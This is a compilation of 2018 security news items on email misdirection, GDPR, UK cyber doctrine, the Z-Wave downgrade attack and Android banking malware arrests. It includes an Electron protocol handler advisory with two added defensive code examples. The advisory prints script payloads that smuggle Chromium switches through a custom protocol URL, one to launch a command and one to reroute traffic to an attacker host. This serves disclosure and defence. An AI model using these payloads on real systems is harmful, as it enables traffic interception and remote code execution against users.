An analysis of those incidents is revealing. Healthcare -- a major worldwide criminal target for extortion and theft of PII -- reported a total of 349 data security incidents in Q4. The most common incidents were not technology-related: 121 incidents involved data posted or faxed to the wrong recipient, or the loss or theft of paperwork.

The most frequent technology-related incidents were not down to hacking, but to simple email failures (49) involving data sent to the wrong recipient, or a failure to use BCC when sending email. There is, in short, an easily overlooked backdoor into GDPR non-compliance.

Data sent to the wrong recipient is commonly addressed by data labeling and data loss prevention technologies. One problem is a high level of both false positives and false negatives. Employees charged with labeling the data they generate frequently 'over-label'; that is, they label unprotected data as 'sensitive' in an abundance of caution. This can lead to time-consuming, hampered workflows. Alternatively, sensitive data can remain unlabeled and still be sent to the wrong address.

In September 2017, the National Law Journal reported, "Wilmer, Cutler, Pickering, Hale and Dorr was caught Wednesday in an email mix-up that revealed secret U.S. Securities and Exchange Commission and internal investigations at PepsiCo, after a Wilmer lawyer accidentally sent a Wall Street Journal reporter privileged documents detailing a history of whistleblower claims at the company." This was not just an embarrassment; had it involved any EU data, it would have been a serious breach of GDPR.

(While writing this article, the author received an email from a major cybersecurity vendor: "You may have accidentally received an email from us yesterday with the subject line “SUBJECT LINE”. Our server had a bad moment and sent the email to wrong people." This was a benign error -- but it could have been serious, and it further illustrates the problem.)

One new start-up firm -- UK-based Tessian -- is seeking to solve the email GDPR backdoor using machine learning artificial intelligence. "What we're doing," co-founder and CEO Tim Sadler told SecurityWeek, "is helping organizations protect against the human threats. At our core, we prevent organizations sending highly sensitive emails to the wrong people."

The difficulty with the email problem is that it doesn't lend itself to a traditional rules-based solution -- email is used too frequently, too easily, with too many subjects and to too many people. "The approach we have taken is machine learning," explained Sadler. "We analyze historical communications patterns to understand the kind of information that is shared with different people in the user's network. On outgoing emails we understand anomalies. We understand that it is unusual that this data is shared with that contact. This is an approach we have not seen elsewhere, but it is one that works very effectively."

He claims that within 24 hours of analyzing the user email logs, a base-line of 'normality' can be produced. Anomalies to that baseline are flagged. Users are kept on board by being fully involved -- flagged emails aren't simply blocked. A full explanation of the system's decision is relayed to the user and can be accepted or overridden -- and the user's response is added to the system's machine learning knowledge. Using credit card fraud as an analogy, he said, "We don't just block the card because of anomalous behavior, we explain why, we ask the user if he wants to unblock it -- and we learn from the process."
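The approach described above, as an added example that is not Tessian's code: a recipient baseline is built from past sending patterns, outgoing mail is scored against it, and the user's accept/override decision feeds back into the baseline. The addresses, the edit-distance lookalike rule and the five-recipient BCC threshold are all constructed for the example.

```python
"""Recipient-anomaly check for outgoing mail: baseline from history, flag
anomalies, let the user decide, learn from the decision.  Added example, not
Tessian code; every address and threshold below is constructed."""
from collections import defaultdict

# Constructed history: (sender, recipient) pairs as extracted from past headers.
# Repetition is what builds confidence in a relationship.
HISTORY = [
    ("alice@corp.example", "bob@corp.example"),
    ("alice@corp.example", "bob@corp.example"),
    ("alice@corp.example", "carol@partner.example"),
    ("alice@corp.example", "carol@partner.example"),
    ("alice@corp.example", "legal@partner.example"),
]


def domain_of(address):
    return address.rsplit("@", 1)[-1].lower()


def build_baseline(history):
    """Per sender: how often each recipient and each recipient domain was used."""
    baseline = defaultdict(lambda: {"recipients": defaultdict(int), "domains": defaultdict(int)})
    for sender, recipient in history:
        entry = baseline[sender.lower()]
        entry["recipients"][recipient.lower()] += 1
        entry["domains"][domain_of(recipient)] += 1
    return baseline


def edit_distance(a, b):
    """Levenshtein distance; used to spot one- or two-keystroke domain typos."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def review_outgoing(baseline, sender, to, cc=(), bcc=(), bulk_threshold=5):
    """Return (kind, detail) findings for the user to accept or override.

    Kinds: 'lookalike-domain', 'unknown-recipient', 'bulk-without-bcc'.
    A new person at a domain the sender already corresponds with is not
    flagged; that is a policy choice made here for the example."""
    entry = baseline.get(sender.lower(), {"recipients": {}, "domains": {}})
    known_domains = set(entry["domains"])
    own_domain = domain_of(sender)
    findings = []
    for rcpt in [r.lower() for r in list(to) + list(cc) + list(bcc)]:
        if rcpt in entry["recipients"]:
            continue
        dom = domain_of(rcpt)
        # A domain a couple of edits away from one the sender uses, but never
        # used itself, is the classic misdirected-mail pattern.
        lookalikes = [k for k in known_domains if k != dom and edit_distance(k, dom) <= 2]
        if lookalikes:
            findings.append(("lookalike-domain", f"{rcpt} resembles {lookalikes[0]}"))
        elif dom not in known_domains:
            findings.append(("unknown-recipient", rcpt))
    # Many external addresses visible to each other in To/Cc is the 'forgot BCC'
    # failure the ICO statistics count; addresses in Bcc are not exposed.
    visible_external = [r for r in list(to) + list(cc) if domain_of(r) != own_domain]
    if len(visible_external) >= bulk_threshold:
        findings.append(("bulk-without-bcc", f"{len(visible_external)} external addresses exposed"))
    return findings


def record_decision(baseline, sender, recipient, accepted):
    """Feed the user's decision back: an accepted recipient joins the baseline,
    so the same flag is not raised again for that relationship."""
    if accepted:
        entry = baseline[sender.lower()]
        entry["recipients"][recipient.lower()] += 1
        entry["domains"][domain_of(recipient)] += 1
```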

The company was founded in 2013 by Tim Sadler, Ed Bishop and Tom Adams, and was originally known as CheckRecipient. In April 2017 it raised $2.7 million seed funding, bringing the total seed funding to $3.8 million. The company was rebranded and renamed as Tessian in February 2018. Part of the reason for the rebranding is the evolving and growing nature of the company.

"Our belief at Tessian," Sadler told SecurityWeek, "is that organizations' security has moved on from perimeter firewalls, and even endpoint security. I think we are in a third phase here, where humans are the real endpoints of the organization. If you look at how hackers try to break into a company, they're not so much hacking devices as hacking the humans.

"We are focused on building security for the human endpoint. In short, we are thinking not just about outbound email threats, but also inbound email threats; and in going beyond that to understand what are the other ways in which humans leak data within an enterprise."

Sadler declined to go into details on Tessian's future road map -- but it is probably fair to say that a machine learning solution to BEC and general phishing threats is on the drawing board. Right now, Tessian is almost unique in bringing a machine learning solution to an email problem that from historical data is likely to prove a major and often overlooked threat to GDPR compliance.


Europol Signs Cybersecurity Agreement With EU Agencies, WEF
25.5.2018 securityweek BigBrothers   

Europol this week signed two memorandums of understanding related to cybersecurity cooperation – one with the World Economic Forum (WEF) and one with the European Union Agency for Network and Information Security (ENISA), the European Defence Agency (EDA), and the EU’s Computer Emergency Response Team (CERT-EU).

The memorandum of understanding (MoU) signed on Wednesday between Europol, ENISA, EDA and CERT-EU establishes a cooperation framework on cyber security and cyber defense.

The agreement focuses on cyber exercises, education and training, exchange of information, strategic and administrative matters, and technical cooperation. The MoU also allows cooperation in other areas that may turn out to be important for all four organizations.

“EDA supports Member States in the development of their defence capabilities. As such, we also act as the military interface to EU policies,” said Jorge Domecq, chief executive of the EDA. “Today’s Memorandum of Understanding is an important step towards increased civil-military cooperation and synergies in the area of cyber security and cyber defence.”

“The EU institutions, bodies and agencies rely on the specialised skills and tools in threat intelligence and incident response of CERT-EU. But, we don’t maintain these capacities by acting alone. That is why acting together with our peers and partners in the other signatories to this Memorandum is so important,” stated Ken Ducatel, acting head of CERT-EU.

As for the MoU signed on Friday by Europol and the WEF, it focuses on establishing a cooperation framework whose goal is to make cyberspace safe for individuals, businesses and organizations.

The WEF and Europol recently announced the launch of a Global Cyber Security Centre located in Geneva, Switzerland.

As part of the new agreement, Europol and WEF will collaborate on the implementation of projects in common areas of interest, best practices, technical information on cybercrime, and statistical data.


UK Warns That Aggressive Cyberattack Could Trigger Kinetic Response
25.5.2018 securityweek BigBrothers   

UK Says it Doesn't Need to Demonstrate Attribution Before Engaging Cyber Retaliation

The scene was set last week when Air Marshal Phil Collins (Chief of Defence Intelligence, UK Ministry of Defence) spoke at the Royal United Services Institute (RUSI). In his speech Collins talked about the growing use of non-kinetic (primarily cyber) warfare.

"We can see numerous examples of this today," he said: "unprecedented industrial espionage activity against the UK and Allies; private security contractors being used in high-end expeditionary warfare in Syria; cyber-attacks against national infrastructure and reputation across Europe; information operations that attempt to pervert political process and frustrate the rule of law; and attempted assassinations."

He warned that the nature of modern warfare is becoming broader, more strategic, and features "continuous full spectrum competition and confrontation."

The UK's response, he said, "should be to understand first, to decide first, and then if necessary to act first, across the physical and virtual, to secure decision advantage and then operational advantage, seeking swift yet controlled exploitation of vulnerabilities and the proactive denial of opportunities."

The implication is that the UK requires the ability (and he makes it clear that he believes the UK has that ability) to both respond to cyber-attacks and if necessary launch preemptive cyber-attacks effectively in self-defense. What he doesn't discuss is the relationship of such actions to international law. That was left to a separate speech delivered Wednesday by the UK attorney general, Jeremy Wright QC MP, at Chatham House: Cyber and International Law in the 21st Century.

While Wright accepts that international cyber law is a difficult area, "cyberspace is an integral part of the rules based international order. That being so, it is the UK’s view that there are boundaries of acceptable state behavior in cyberspace, just as there are everywhere else."

What this means, he says, "is that hostile actors cannot take action by cyber means without consequence, both in peacetime and in times of conflict. States that are targeted by hostile cyber operations have the right to respond to those operations in accordance with the options lawfully available to them and that in this as in all things, all states are equal before the law."

In effect, his speech discusses legal and illegal nation-level cyber activity; and his view of a legal and illegal UK response to that.

Two aspects stand out. First, he defines a cyber-attack against the critical infrastructure that can or does lead to loss of life as an unlawful use of force that can trigger a non-cyber response. "The UK considers it is clear that cyber operations that result in, or present an imminent threat of, death and destruction on an equivalent scale to an armed attack will give rise to an inherent right to take action in self-defense, as recognized in Article 51 of the UN Charter."

Article 51 states, "Nothing in the present Charter shall impair the inherent right of individual or collective self-defense if an armed attack occurs..." In short, the UK attorney general is stating that such cyber-attacks can legally result in a kinetic military response.

In reality, there is little new here. Bryson Bort, CEO and founder at Scythe -- and a visiting fellow at the National Security Institute, George Mason University -- told SecurityWeek, "This 'position' tends to be the prevailing opinion, but between what is publicly stated and whatever classified response may have been made in line with this doctrine, we only have confirmation that loss of life equals kinetic response, a.k.a. traditional military reprisal."

Slavik Markovich, CEO and Co-founder at Demisto, wonders if -- under this doctrine -- a state can lawfully make a preemptive strike in order to prevent the potential future loss of life. "Take Stuxnet," he said. "Is it OK for a state to launch a cyber-attack on another state’s weapon systems to preemptively defend against said state that has publicly declared it wants to destroy the cyber offensive state?”

Jeremy Wright never uses the term preemptive -- but Air Marshal Collins does with his 'proactive denial of opportunities' assertion.

The second stand-out from Wright's speech suggests that cyber-attacks that do not threaten life cannot lawfully result in a kinetic response. This would include Russian interference in the U.S. 2016 election (note that former director of national intelligence James Clapper told PBS NewsHour Wednesday that he believes that Russian interference didn't just influence the election, but actually won it for Donald Trump).

Wright says it is clearly an unlawful act, and the victim (in this example, the U.S.) has the right to respond against the aggressor (in this example, Russia) -- but the type of response is tempered by the doctrine of countermeasures. "Countermeasures cannot involve the use of force, and they must be both necessary and proportionate to the purpose of inducing the hostile state to comply with its obligations under international law."

The UK disagrees in one matter with the work of the International Law Commission on countermeasures. It does not believe that a retaliating nation needs to tell the aggressor that it will retaliate -- it can simply do so. That retaliation cannot be by force, but does not need to be symmetrical to the underlying unlawful act.

In simple terms, a cyber-attack that leads to loss of life can legally elicit a military response. A cyber-attack that does not lead to loss of life can only legally elicit a greater cyber response. "This statement by the UK Attorney General is the first official statement that reflects the truth on the ground," comments Bort. It "is a pragmatic recognition of the realities of cyber warfare... It means a lot to be the first to provide this position publicly and the popularity of this position will grow from here."

But underlying these arguments -- and one discussed at some length by Wright -- is the problem of attribution. "There are obviously practical difficulties involved in making any attributions of responsibilities when the action concerned is capable of crossing traditional territorial boundaries and sophisticated techniques are used to hide the identity and source of the operation," he says. "Those difficulties are compounded by the ready accessibility of cyber technologies and the resultant blurring of lines between the actions of governments and those of individuals."

Nathan Wenzler, chief security strategist at AsTech, is particularly worried about attribution and the UK's attitude towards it. "It's a troubling problem," he told SecurityWeek, "and one which no one has solved to such an extent that would allow them to make definitive statements such as Mr. Wright's, and this leaves open the potential for a wide array of legal, ethical and political issues that may come about from retaliating against an entity that either did not actually commit the initial attack or ultimately had nothing to do with the attack at all. And, while nation-state sponsored cyber-attacks are a well-known issue, it doesn't mean that it is always the case, and the political ramifications of launching any type of response against another country without definitive proof can lead to far greater disasters."

Bort is a little less concerned. "Attribution is hard no matter who you are," he said. "But, nation states with advanced cyber and intelligence capabilities have a long history of solving the attribution problem. There may be a few more question-marks in the cyber domain as to who certain cyber attackers are, but it’s a generally small list of perpetrators to look at. The UK government will likely be absolutely sure when they respond."

The key phrase from Bort is 'intelligence capabilities'. Security researchers can only track cyber in cyber -- and that is the problem. Nation states -- particularly members of the Five Eyes group -- have access to wide-ranging high-grade signals intelligence and on-the-ground agents that may provide irrefutable proof that the intelligence services will never reveal for fear of losing or endangering their sources.

"I fear this may just be a setup for more strained political relationships between adversaries and no real improvement to the overall security of the cyberspace used by their citizens, corporations and other entities," warns Wenzler. He may well be right; but there is one single sentence in Wright's speech that takes the issue to a new level.

"There is no legal obligation requiring a state to publicly disclose the underlying information on which its decision to attribute hostile activity is based, or to publicly attribute hostile cyber activity that it has suffered in all circumstances," he says.

If there is a purely political intent behind this speech, it is to warn foreign aggressor states that the UK (and/or its allies) can lawfully respond to an aggressive cyber-attack either by kinetic or cyber actions; and that it is not duty-bound to provide public proof of its attribution. It can legally strike back without warning.


More than 100 Million IoT devices potentially exposed to Z-Shave Z-Wave attack
25.5.2018 securityaffairs IoT  

Researchers from Pen Test Partners have analyzed the Z-Wave wireless communications protocol used by millions of IoT devices and discovered that it is vulnerable to cyber attacks.

The Z-Wave protocol is widely adopted for home automation; it uses low-energy radio waves for wireless communications over distances of up to 100 meters (330 feet).

The protocol is currently used by 700 companies in over 2,400 IoT and smart home products.

Z-Wave uses a shared network key to secure communications among devices; the key is exchanged between the controller and the client devices when they are paired.

The earlier pairing process (‘S0’) had a vulnerability – the network key was transmitted between the nodes using a key of all zeroes, and could be sniffed by an attacker within RF range.


The initial version of the pairing process (S0) has been known to be vulnerable to MITM attacks since 2013; for this reason, a more secure process named S2 was introduced.

While S0 used a known encryption key (0000000000000000), S2 uses stronger encryption; however, the experts found a way to force a downgrade of the pairing process from S2 to S0.

The white hat hackers discovered that an attacker in range of the targeted devices during the pairing process (‘S0’) can easily sniff the network key because it was shared between

The experts dubbed the attack “Z-Shave.”

“The earlier pairing process (‘S0’) had a vulnerability – the network key was transmitted between the nodes using a key of all zeroes, and could be sniffed by an attacker within RF range. This issue was documented by Sensepost in 2013. We have shown that the improved, more secure pairing process (‘S2’) can be downgraded back to S0, negating all improvements.” reads the analysis published by the experts.

“Once you’ve got the network key, you have access to control the Z-Wave devices on the network. 2,400 vendors and over 100 million Z-wave chips are out there in smart devices, from door locks to lighting to heating to home alarms.”

The experts published a video PoC of the attack against a Yale smart lock; “Z-Shave” works against any device using Z-Wave.

Researchers at Pen Test Partners explained that an attacker could use a battery-powered hacking device that is left outside the targeted building waiting for the pairing process to be initialized.

“A downgrade to no security may sound like it has more serious impact, but it means that the attacker cannot obtain the S0 network key. This means the only node placed at risk is the one just added. If an S0 network key is obtained, all S0 devices connected in the past and future are placed at risk.” explained the experts.

“The bigger difference is that our attack can be carried out by an active attacker within RF range at the time of pairing. And when we say active attacker – we don’t mean a guy in a hoody sat in a car with a laptop. A battery-powered drop-box could be left outside the property for weeks, waiting for a pairing event to occur.”

It turns out that a variant of this downgrade attack was discovered last year by cybersecurity consulting firm SensePost, but the vendor told experts at the time that this was by design and needed for backwards compatibility.

The experts explained that the Z-Wave Alliance still hasn’t addressed the issue, a delay that could have serious consequences.

“We aren’t certain how backward compatibility with S0 can be supported whilst enforcing stronger S2 security. This underlines the challenge with many protocols: how do you improve security without creating mountains of electronic waste for devices that are no longer supported?” concluded the experts.

“At the very least, the user should be fully alerted to the fallback to weak security.”


Russian Police Arrest Man Involved in Android Banking Trojan Scheme
25.5.2018 securityweek Crime Virus

Law enforcement authorities in Russia have arrested an unnamed 32-year-old man who is believed to be part of a cybercrime ring that made up to $8,000 per day using Android banking Trojans.

According to Russia-based cybersecurity firm Group-IB, the suspect is an unemployed Russian national who had previously been convicted for arms trafficking. He was arrested earlier this month and reportedly already confessed.

The cybercrime group used a malicious Android app named “Banks at your fingertips” to trick the customers of Russian banks into handing over their financial information. The banking Trojan was disguised as a tool that claimed to allow users to access all their bank accounts from one Android app. It offered users the possibility to view balances, transfer money between payment cards, and pay for online services.

The malicious app, distributed via spam emails since 2016, instructed users to enter their card details, which were then sent to a server controlled by the attackers. The cybercrooks transferred between $1,500 and $8,000 per day from victims’ bank accounts, $200-$500 at a time. The criminal proceeds were laundered using cryptocurrencies.

The malware also helped the attackers intercept the SMS confirmation codes sent by banks, at the same time blocking all text messages confirming transactions in an effort to avoid raising suspicion.

While Russia has occasionally collaborated with Western law enforcement agencies to bring down global cybercrime operations, it has often turned a blind eye to the activities of hackers who have mainly targeted the United States.

Four Russian nationals are currently on the FBI’s Cyber Most Wanted list, including the alleged administrator of a massive cybercrime scheme involving the Zeus Trojan, and three people believed to have been involved in attacks on Yahoo that resulted in roughly 500 million accounts getting compromised.

The Russian government has defended some of the alleged hackers arrested by the United States – in one case Moscow accused Washington of abducting the son of a lawmaker.

On the other hand, the government has been known to crack down on cybercrime rings that target Russian citizens. Police have arrested 50 hackers believed to have used the Lurk Trojan, the creator of the Svpeng Android malware, and nine people who allegedly stole $17 million from bank accounts.


EU's New Data Protection Rules Come Into Effect
25.5.2018 securityweek  BigBrothers

The European Union's new data protection laws came into effect on Friday, with Brussels saying the changes will protect consumers from being like "people naked in an aquarium".

The EU's so-called General Data Protection Regulation (GDPR) has been blamed for a flood of spam emails and messages in recent weeks as firms rush to request the explicit consent of users to contact them.

Even though the rules were officially adopted two years ago, with a grace period until now to adapt to them, companies have been slow to act, resulting in a last-minute scramble this week.

Britain's data protection watchdog, the Information Commissioner's Office (ICO), said that its site had experienced "a few interruptions" as the deadline loomed, but said that "everything is working now".

Brussels insists that the laws will become a global benchmark for the protection of people's online information, particularly in the wake of the Facebook data harvesting scandal.

"The new rules will put the Europeans back in control of their data," said EU Justice Commissioner Vera Jourova.

"When it comes to personal data today, people are naked in an aquarium."

Companies can be fined up to 20 million euros ($24 million) or four percent of annual global turnover for breaching the strict new data rules for the EU, a market of 500 million people.

- Explicit consent -

The law establishes the key principle that individuals must explicitly grant permission for their data to be used.

The new EU law also establishes consumers' "right to know" who is processing their information and what it will be used for.

People will be able to block the processing of their data for commercial reasons and even have data deleted under the "right to be forgotten".

Parents will decide for children until they reach the age of consent, which member states will set anywhere between 13 and 16 years old.

The case for the new rules has been boosted by the recent scandal over the harvesting of Facebook users' data by Cambridge Analytica, a US-British political research firm, for the 2016 US presidential election.

The breach affected 87 million users, but Facebook said Wednesday it has found no evidence that any data from Europeans were sold to Cambridge Analytica.

Facebook chief Mark Zuckerberg said in a hearing at the European Parliament on Tuesday that his firm will not only be "fully compliant" with the EU law, but will also make huge investments to protect users.

Zuckerberg said he was "sorry" for the Cambridge Analytica breaches, but also for its failure to crack down on election interference, "fake news" and other data misuses.

- 'Global standard' -

Big platforms like Facebook, WhatsApp and Twitter seem well prepared for the new laws, while smaller businesses have voiced concern.

But EU officials say they are initially focusing on the big firms, whose business models use a goldmine of personal information for advertising, while offering smaller firms more time to adapt.

Meanwhile Brussels has expressed impatience with the eight countries -- out of the EU's 28 -- that say they will not have updated their laws by Friday.

EU Commissioner Jourova said the new rules are setting "a global standard of privacy".

Many Americans who once criticised Europe as too quick to regulate the new driver of the global economy now see the need for the GDPR, EU officials insist.

"I see some version of GDPR getting quickly adopted at least in the United States," Param Vir Singh, a business professor at Carnegie Mellon University, told AFP in an email.

Japan, South Korea, India and Thailand are also drawing "some inspiration" from Brussels as they debate or adopt similar laws, another EU official said.


Flaw in Schneider PLC Programming Tool Allows Remote Attacks
25.5.2018 securityweek Vulnerebility

Schneider Electric this week announced that an update for its EcoStruxure Machine Expert product patches a high severity vulnerability that can be exploited remotely to obtain sensitive data.

EcoStruxure Machine Expert - Basic, formerly known as SoMachine Basic, is a lightweight tool designed for programming Schneider’s Modicon M221 programmable logic controller (PLC).

Gjoko Krstic, a researcher at industrial cybersecurity firm Applied Risk, discovered recently that SoMachine Basic 1.6.0 build 61653, 1.5.5 SP1 build 60148, and likely earlier versions are impacted by an XML external entity (XXE) vulnerability that can be exploited to launch an out-of-band (OOB) attack.

Tracked as CVE-2018-7783, the vulnerability can be exploited by a remote and unauthenticated attacker to read arbitrary files on the targeted system. These files can include sensitive information, including passwords, user data, and details about the system.

For the attack to work, the hacker needs to convince the targeted user to open a specially crafted SoMachine Basic project or template file.

“The vulnerability is triggered when input passed to the XML parser is not sanitized while parsing the XML project and/or template file,” Krstic wrote in an advisory.

The researcher also pointed out that in certain circumstances the flaw can also be exploited for arbitrary code execution and to cause a denial-of-service (DoS) condition.

Schneider Electric patched the vulnerability with the release of SoMachine Basic v1.6 SP1.

Last month, at SecurityWeek’s ICS Cyber Security Conference in Singapore, Krstic disclosed the details of a DoS vulnerability that affects safety controllers from several major vendors, including devices that are directly exposed to the Internet.

In January, Schneider Electric informed customers that its Floating License Manager, a tool that helps organizations manage licenses for Schneider products, contained code execution, open redirect and DoS vulnerabilities due to the use of a third-party component named Flexera FlexNet Publisher. The security holes were discovered in FlexNet Publisher in 2016 and 2017.

One week ago, Schneider published another advisory to inform customers that these flaws also impact PlantStruxure PES. ICS-CERT has also published an advisory on Thursday for the Floating License Manager issues.


Electron Windows Protocol Handler MITM/RCE (bypass for CVE-2018-1000006 fix)
25.5.2018 securityaffairs Vulnerebility

As part of an engagement for one of our clients, we analyzed the patch for the recent Electron Windows Protocol handler RCE bug (CVE-2018-1000006) and identified a bypass.
Under certain circumstances, this bypass leads to session hijacking and remote code execution. The vulnerability is triggered by simply visiting a web page through a browser. Electron apps designed to run on Windows that register themselves as the default handler for a protocol and do not prepend dash-dash in the registry entry are affected.

We reported the issue to the Electron core team (via security@electronjs.org) on May 14, 2018, and received immediate notification that they were already working on a patch. The issue was also reported by Google’s Nicolas Ruff a few days earlier.

CVE-2018-1000006
On January 22, 2018, Electron released a patch for v1.7.11, v1.6.16 and v1.8.2-beta4 for a critical vulnerability known as CVE-2018-1000006 (surprisingly no fancy name here) affecting Electron-based applications running on Windows that register custom protocol handlers.

The original issue was extensively discussed in many blog posts, and can be summarized as the ability to use custom protocol handlers (e.g. myapp://) from a remote web page to piggyback command line arguments and insert a new switch that Electron/Chromium/Node would recognize and execute while launching the application.

<script>
win.location = 'myapp://foobar" --gpu-launcher="cmd c/ start calc" --foobar='
</script>
Interestingly, on January 31, 2018, Electron v1.7.12, v1.6.17 and v1.8.2-beta5 were released. It turned out that the initial patch did not take uppercase characters into account, which allowed a bypass of the previous patch with:

<script>
win.location = 'myapp://foobar" --GPU-launcher="cmd c/ start calc" --foobar='
</script>
Understanding the patch
The patch for CVE-2018-1000006 is implemented in electron/atom/app/command_line_args.cc and consists of a validation mechanism which ensures users won’t be able to include Electron/Chromium/Node arguments after a URL (the specific protocol handler). Bear in mind that some locally executed applications do require the ability to pass custom arguments.

bool CheckCommandLineArguments(int argc, base::CommandLine::CharType** argv) {
  // Binary search below is only correct if kBlacklist is sorted; the DCHECKs
  // are active in debug builds only.
  DCHECK(std::is_sorted(std::begin(kBlacklist), std::end(kBlacklist),
                        [](const char* a, const char* b) {
                          return base::StringPiece(a) < base::StringPiece(b);
                        }))
      << "The kBlacklist must be in sorted order";
  DCHECK(std::binary_search(std::begin(kBlacklist), std::end(kBlacklist),
                            base::StringPiece("inspect")))
      << "Remember to add Node command line flags to kBlacklist";

  const base::CommandLine::StringType dashdash(2, '-');
  bool block_blacklisted_args = false;
  for (int i = 0; i < argc; ++i) {
    // Everything after a bare "--" is never parsed as a switch; stop checking.
    if (argv[i] == dashdash)
      break;
    // Once a URL argument has been seen, blacklisted switches are rejected.
    if (block_blacklisted_args) {
      if (IsBlacklistedArg(argv[i]))
        return false;
    } else if (IsUrlArg(argv[i])) {
      block_blacklisted_args = true;
    }
  }
  return true;
}
As is commonly seen, blacklist-based validation is prone to errors and omissions, especially in complex execution environments such as Electron:

The patch relies on a static blacklist of available chromium flags. On each libchromiumcontent update the Electron team must remember to update the command_line_args.cc file in order to make sure the blacklist is aligned with the current implementation of Chromium/v8
The blacklist is implemented using a binary search. Valid flags could be missed by the check if the list is not properly sorted
Bypass and security implications
We started looking for missed flags and noticed that host-rules was absent from the blacklist. With this flag, one may specify a set of rules to rewrite domain names for requests issued by libchromiumcontent. This immediately sticks out as a good candidate for subverting the process.

In fact, an attacker can exploit this issue by overriding the host definitions in order to perform a completely transparent Man-in-the-Middle attack:

<!doctype html>
<script>
window.location = 'skype://user?userinfo" --host-rules="MAP * evil.doyensec.com" --foobar='
</script>
When a user visits a web page in a browser containing the preceding code, the Skype app will be launched and all Chromium traffic will be forwarded to evil.doyensec.com instead of the original domain. Since the connection is made to the attacker-controlled host, certificate validation does not help as demonstrated in the following video:

https://blog.doyensec.com/public/images/skypeelectronbugpoc.mp4

We analyzed the impact of this vulnerability on popular Electron-based apps and developed working proofs-of-concept for both MITM and RCE attacks. While the immediate implication is that an attacker can obtain confidential data (e.g. OAuth tokens), this issue can also be abused to inject malicious HTML responses containing XSS -> RCE payloads. With nodeIntegration enabled, this is simply achieved by leveraging Node’s APIs. When encountering application sandboxing via nodeIntegration: false or sandbox, it is necessary to chain this with other bugs (e.g. nodeIntegration bypass or IPC abuses).

Please note that it is only possible to intercept traffic generated by Chromium, not by Node. For this reason, Electron’s update feature, along with other critical functions, is not affected by this vulnerability.

Future
On May 16, 2018, Electron released a new update containing an improved version of the blacklist for v2.0.1, v1.8.7, and v1.7.15. The team is actively working on a more resilient solution to prevent further bypasses. Considering that the API change may potentially break existing apps, it makes sense to see this security improvement within a major release.

In the meantime, Electron application developers are recommended to enforce a dash-dash notation in setAsDefaultProtocolClient:

app.setAsDefaultProtocolClient(protocol, process.execPath, [
  '--your-switches-here',
  '--'
])
or in the Windows protocol handler registry entry

secure Windows protocol handler
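One way for the main process to consume the protocol URL safely once the handler is registered with the trailing '--', as an added example (not code from the Doyensec post or from Electron); the scheme name myapp and the argv arrays are constructed for this illustration:

```javascript
// Added example, not from the Doyensec post or from Electron itself.
// Assumes the handler was registered with a trailing "--" as recommended
// above, so the OS launches `app.exe --your-switches-here -- "<url>"` and
// process.argv carries "--" before the untrusted URL. SCHEME is hypothetical.

const SCHEME = 'myapp';

// Returns the custom-protocol URL found after "--", or null when the launch
// is not in the expected shape. Everything before "--" is our own registered
// switches; everything after it is untrusted data that Chromium has already
// refused to interpret as switches, so here we only have to pick out the URL
// and ignore anything else, without any blacklist of flag names to maintain.
function extractProtocolUrl(argv, scheme = SCHEME) {
  const sep = argv.indexOf('--');
  if (sep === -1) {
    // No terminator: the handler was not registered with "--", so any switch
    // appended to the URL has already been parsed by Chromium. Refuse to
    // proceed rather than guess which argument is the URL.
    return null;
  }
  const positional = argv.slice(sep + 1);
  const prefix = `${scheme}://`;
  // Case-insensitive on purpose: the scheme part of a URL is not case-sensitive.
  const candidate = positional.find((a) => a.toLowerCase().startsWith(prefix));
  if (!candidate) return null;

  // A raw space followed by a dash is never part of a legitimate URL; it is
  // the signature of a switch that was not split off by the shell. Reject it
  // so the value is never forwarded to a child process or re-parsed.
  if (/\s--?[a-z]/i.test(candidate)) return null;

  let parsed;
  try {
    parsed = new URL(candidate); // WHATWG parser, accepts non-special schemes
  } catch (e) {
    return null;
  }
  if (parsed.protocol !== `${scheme}:`) return null;
  return parsed.href;
}

// Constructed argv arrays in the shape Windows would hand the process.
// With "--" present, switches appended to the URL become inert positional args.
const ARGV_WITH_DASHDASH = ['app.exe', '--your-switches-here', '--',
  'myapp://foobar', '--host-rules=MAP * evil.example', '--foobar='];
// Without "--" the same launch cannot be trusted at all.
const ARGV_WITHOUT_DASHDASH = ['app.exe', 'myapp://foobar', '--GPU-launcher=cmd'];

console.log(extractProtocolUrl(ARGV_WITH_DASHDASH));    // myapp://foobar
console.log(extractProtocolUrl(ARGV_WITHOUT_DASHDASH)); // null
```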

As a final remark, we would like to thank the entire Electron team for their work on moving to a secure-by-default framework. Electron contributors are tasked with the non-trivial mission of closing the web-native desktop gap. Modern browsers are enforcing numerous security mechanisms to ensure isolation between sites, facilitate web security protections and prevent untrusted remote content from compromising the security of the host. When working with Electron, things get even more complicated.


Russian speaking hacker arrested for stealing $8,000 per day leveraging mobile malware
25.5.2018 securityaffairs  
Virus

Moscow, May 24, 2018 – law enforcement, with support from Group-IB, has arrested a 32-year-old hacker accused of stealing funds from Russian banks’ customers using Android mobile malware.
At the height of their activity, victims reportedly lost between 1,500 and 8,000 dollars daily, and the group leveraged cryptocurrency for laundering.

Group-IB’s analysis reviewed the tools and techniques leveraged in the group’s attacks, revealing that the gang tricked customers of Russian banks into downloading the malicious mobile application “Banks at your fingertips”. The app claimed to be an aggregator of the country’s leading mobile banking systems and promised users ‘one-click’ access to all bank cards to view balances, transfer money from card to card, and pay for online services. The app was first discovered in 2016 and was distributed through spam emails.

The criminal group’s approach was rather elementary: customers of banks downloaded the fake mobile app and entered their card details. The Trojan then sent bank card data or online banking credentials to the C&C server. Following this, the threat actor transferred 200-500 dollars at a time to previously activated bank accounts, and bypassed SMS confirmation codes which were intercepted from the victim’s phone. The victims were not aware of the transactions as all SMS confirmations of transactions were blocked.

The investigation by authorities identified a member of the criminal group who was responsible for transferring money from user accounts to the attacker’s cards: a 32-year-old unemployed Russian national who had previous convictions connected to arms trafficking. During the suspect’s arrest in May 2018, authorities identified SIM cards and fraudulent bank cards to which stolen funds were transferred. The suspect has confessed to his actions and the investigation/prosecution continues.

mobile malware

